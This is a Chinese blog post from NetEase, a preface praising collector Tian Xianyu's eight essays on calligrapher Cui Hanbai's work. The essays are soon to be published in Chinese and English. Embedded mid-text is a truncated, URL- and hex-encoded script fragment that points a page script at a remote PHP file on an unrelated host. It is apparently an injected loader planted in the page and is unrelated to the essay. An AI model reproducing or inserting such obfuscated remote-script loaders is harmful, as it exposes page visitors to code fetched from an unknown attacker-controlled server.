注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

兰湾散人

以书法会友

 
 
 

日志

 
 
 
 

谢媛媛:田先钰先生赏析寒柏书作文集序  

2010-09-01 11:08:28|  分类: 崔寒柏书法研究 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 说起来,田先钰先生与寒柏的相识绝不是一个偶然。田先生爱书法,喜欢书家的书作,或多或少总要尽力收藏一些。而寒柏自从06年回国后,也与国内书法界有了一些交流,参与了一些活动。寒柏回忆说:第一次与田先生相见是在天津书协举办的一次书作交流活动上。正如田先生文章中所说,寒柏从来就不是一个谦逊而低调的人,他对自己才华的自信,使自己时时显露着锋芒。在交流活动中,寒柏又是一番侃侃地评论,而他的身边一直站着一个人,十分认真地听着寒柏的评析,这个人就是田先钰先生。不久后,田先生便让他的秘书出面,收藏了第一批寒柏的作品,继而便邀请我和寒柏吃饭。在饭桌上,田先生与寒柏相谈甚欢。两人都从美国回来,坦率对坦率,便无初相识的局促。田先生拿出随身的笔记本电脑,兴致十分的高,说他收藏了寒柏那批作品后,反复观摩,喜欢得很,抑制不住自己的感受,在博客上写了《评崔寒柏:华丽灵动的辞章》。我们轮流拜读了田先生的文章,并一起交流感受,这也加深了田先生对寒柏的了解。

随着田先生一批又一批地收藏寒柏的书作,《评崔寒柏》就有了一评、二评、三评……直到八评。每一评,田先生都会在发表在博客上之后发短信给寒柏。而随着一次次阅读田先生评寒柏的文章,我和寒柏欣喜不已:收藏寒柏书作的人已不计其数,大量收藏寒柏书作的人也不少了,但能在收藏之后,将自己评赏写成了这“八评”的人,田先生是第一人。我能相信,在寒柏百年之后,会有无数人写文章去评析、研究寒柏的书作。但,田先生的“八评”却意义非常。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D">田先生以自己观摩寒柏作品的感受为主导,感性地写下了他个人对这些书作的评析。这些评析是艺术的,是真挚的。当我读到田先生在文章中用大小提琴之音来比喻寒柏大小行书时,我十分诧异与惊喜:对照着寒柏的书作,似乎那提琴美妙的音乐就在寒柏书作的字间流动。我日夜在寒柏身边,与他相谈,看着他每一幅作品的出世,怎么可能会有人形容出我从未感受过的美妙!这也是田先生让我写这本书的序言,我却迟迟地下不了笔的原因,直到田先生催得紧。我害怕了,我怕自己用所学的那些微末、不足以论道的所谓的“专业知识”亵渎了这份纯粹。

我曾努力地去读某些我认为应该是有相当水平的“理论家” 的著书,却很多时候看不完第一页。那些句子,当你深呼吸,却一口气念不完一句话,句中出现多个生僻的专业词汇,甚至还用有倒装等语法,当我集中精神琢磨出这句话的意思时,已忘了上句说的是什么——也许我是一个比较笨的人吧。某一次,我在办公室里,听到一个音乐老师在为课件选音乐片段,有一段十分离奇的声音(我只能说它是一段声音),里面有尖叫、嘶吼、呻吟……,我只觉得跟游乐园鬼屋里的背景音很像,我半疑半解地问那位音乐老师:原来你们音乐界也正流行这种奇异的、前卫的东西吗?她苦笑了一下,对我解嘲:呵呵,这也是一个流派吧。艺术是直通心灵的东西!也许我们之中有很多人早就忘了,只会像对待一个人体标本一样去解剖艺术。我们已经不知道自己应该追求些什么。

再回来读田先生的文章,如清澈而流畅的河水,让人如此舒服。跟随着这河流,看尽河下游戏的鱼、斑斓的石、折射的光影。如果不是河水这样清澈,我们看见的是怎样的景?我常常听得有些人,对着一些优秀的书作评论:“这字儿写得哪一家都不像啊?”“这墨色变化太不足!”“这作品取法太近,要追秦汉才高古!”也常常听得有些人激动地赞赏:范曾的小童老头画得好!黄胄的驴子画得好!问问他怎么好了?答曰:“好啊!……好!真是好!”。此当代艺术审美的悲哀也!

如今,田先生这“八评崔寒柏”要以中英文出版了,书中的书作也几乎都是田先生所收藏。我想田先生无意于炫耀自己的文与收藏,只在于与拥有这本书的人分享读寒柏书作的感受吧!

在此,代表寒柏一同感谢田先钰先生的这番情意!

 

谢媛媛2010年夏于阳光100寓所

  评论这张
 
阅读(470)| 评论(11)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018